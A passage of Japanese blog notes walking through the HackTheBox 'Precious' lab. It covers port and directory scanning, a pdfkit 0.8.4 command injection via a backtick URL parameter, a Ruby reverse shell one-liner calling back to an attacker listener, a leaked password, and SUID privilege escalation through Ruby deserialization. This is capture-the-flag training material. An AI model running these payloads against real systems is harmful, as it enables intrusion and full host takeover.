HTB_Precious_Linux

nmap -Pn -sV -sC 〇.〇.〇.〇 –min-rate 1000 -p-

vi /etc/hosts 〇.〇.〇.〇  precious.htb ホスト名解決

dirsearch -u precious.htb   ディレクトリブルートフォース

feroxbuster -u http://precious.htb ディレクトリブルートフォース

curl -I 〇.〇.〇.〇  ヘッダーが見られる

BurpSuite Rubyを使ってる?

python3 -m http.server 80 80番ポートでHTTP起動

exiftool 〇〇〇〇 ファイルのプロパティを見る

pdfkit 0.8.4 のexploit

http://10.10.14.2/?name=%20‘id‘ とするとidコマンドが実行されたPDF

idをリバースシェルに置き換える。Rubyを使おう

こちらの待ち受け nc -lvnp 9001

RverseShellGeneratorでRubyのリバースシェルコマンドを作成

ruby -rsocket -e’spawn(“sh”,[:in,:out,:err]=>TCPSocket.new(“10.10.14.2”,9001))’ ← これをidと置き換える

/home/ruby/.bundle/configに henryのパスワード

sshでログインすると user.txtあり

sudo -l ユーザーに許可されているコマンドを表示

Ruby gem デシリアライゼーションの脆弱性

get_set に “chmod +s /bin/bash”  /bin/bashをファイルの所有者権限で実行コマンド

/bin/bash -p

vi /etc/hosts で リダイレクトされないように

ssh -v   詳細が出てくる

dirsearch -u http://〇〇〇〇 ディレクトリの列挙

メモ
スポンサーリンク
kotohaをフォローする

コメント